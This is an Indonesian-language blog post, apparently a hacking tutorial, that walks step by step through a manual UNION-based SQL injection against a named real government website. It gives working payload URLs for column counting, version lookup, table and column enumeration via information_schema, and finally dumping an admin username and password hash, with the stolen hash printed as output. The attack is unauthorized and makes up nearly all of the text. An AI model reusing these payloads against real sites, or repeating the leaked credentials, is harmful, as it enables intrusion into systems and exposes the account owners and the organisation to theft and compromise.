Sqli Manual Basic
target:http://www.bdg.lapan.go.id/index.php?nama=reinstra&opt=detail&id=27
[tester]
http://www.bdg.lapan.go.id/index.php?nama=reinstra&opt=detail&id=27'
hasil:
text nya kosong berarti vuln dinda
[ mencari jumlah kolom ]
lanjutt kita cari jumlah kolomnya
dengan caara menambahkan perintah order by 1-- order by 2-- dan seterusnya sampai menemukan error lagi
http://www.bdg.lapan.go.id/index.php?nama=reinstra&opt=detail&id=27 order by 1-- <= tidak error
http://www.bdg.lapan.go.id/index.php?nama=reinstra&opt=detail&id=27 order by 100-- <= tidak error
nah lohh kok di angka 100 gk error padahal hampir semua web gk sampai 100 walaupun ada yg lebih dari 100 sih
kita coba bypass dengan cara menambahkan tanda ' di belakang angka id dan +-
http://www.bdg.lapan.go.id/index.php?nama=reinstra&opt=detail&id=27' order by 100--+- <= error
xixixi kita telusuri sampai menemukan awal errornya
http://www.bdg.lapan.go.id/index.php?nama=reinstra&opt=detail&id=27' order by 12--+- <= masih error
http://www.bdg.lapan.go.id/index.php?nama=reinstra&opt=detail&id=27' order by 10--+- <= normal
http://www.bdg.lapan.go.id/index.php?nama=reinstra&opt=detail&id=27' order by 11--+- <= error
nahh berarti ini ada 10 tabel heheh
lanjuut
[ mencari angka injeksi ]
kita cari pakai perintah union select
http://www.bdg.lapan.go.id/index.php?nama=reinstra&opt=detail&id=-27' UNION SELECT 1,2,3,4,5,6,7,8,9,10--+-
wehh keluar angka 7
lanjutt lagi
[ mencari versi mysql nya ]
dengan menambahkan perintah version() atau @@version
di angka yang keluar tadi
http://www.bdg.lapan.go.id/index.php?nama=reinstra&opt=detail&id=-27' UNION SELECT 1,2,3,4,5,6,version(),8,9,10--+-
hasil: 5.1.69 heheh alhamdulillah dinda
lanjut lagi'
[ kita keluarkan tabelnya ]
dengan perintah group_cocat(table_name) dan iikuti dengan perintah information_schema.tables where table_schema=database()
http://www.bdg.lapan.go.id/index.php?nama=reinstra&opt=detail&id=-27' UNION SELECT 1,2,3,4,5,6,group_concat(table_name),8,9,10 from information_schema.tables where table_schema=database()--+-
hasil:
admin_univ,aktivitas_geomagnet,album_galery,artikel,banner,blok_situs,config_situs,download,events,faq,galery,halaman,humas,insidentil,kategori_download,kti,lm_cuaca_antariksa,lm_frekuensi_radio,lm_ozon_polusi,lm_ozon_polusibak,lm_perkiraan_iklim,makalah,menu_situs,news,peneliti,pengamat,pengamatan,poll_answer,poll_ip,poll_question,reinstra_data,reinstra_pengantar,seminar,sessions,topik_artikel,topik_news
ada 2 tabel yang harus kita curgai yakni admin_univ dan config_situs
[ kita buka kolom nya ]
dengan perintah group_concat(column_neme) from information_schema.columns where table_name=hexa dari tabel yang ingin kita buka
http://www.bdg.lapan.go.id/index.php?nama=reinstra&opt=detail&id=-27' UNION SELECT 1,2,3,4,5,6,group_concat(column_name),8,9,10 from information_schema.columns where table_name=0x61646d696e5f756e6976--+-
61646d696e5f756e6976 adalah hexa dari admin_univ
hasil:
aid,username,password,fullname,institution,email,email1,address,city,province,country,zip,phone
kita buka username dan passwordnya
[ buka data]
dengan perintah group_concat(username,0x3a,password) from admin_univ
http://www.bdg.lapan.go.id/index.php?nama=reinstra&opt=detail&id=-27' UNION SELECT 1,2,3,4,5,6,group_concat(username,0x3a,password),8,9,10 from admin_univ--+-
hasil:
patah:87683e53d7fd7cda20b3629df4aa44f0
Subscribe to:
Post Comments (Atom)
No comments:
Write komentarPengunjung Yang Baik Adalah Pengunjung Sering Berkomentar Pada Suatu Blog Yang Di Kunjunginya...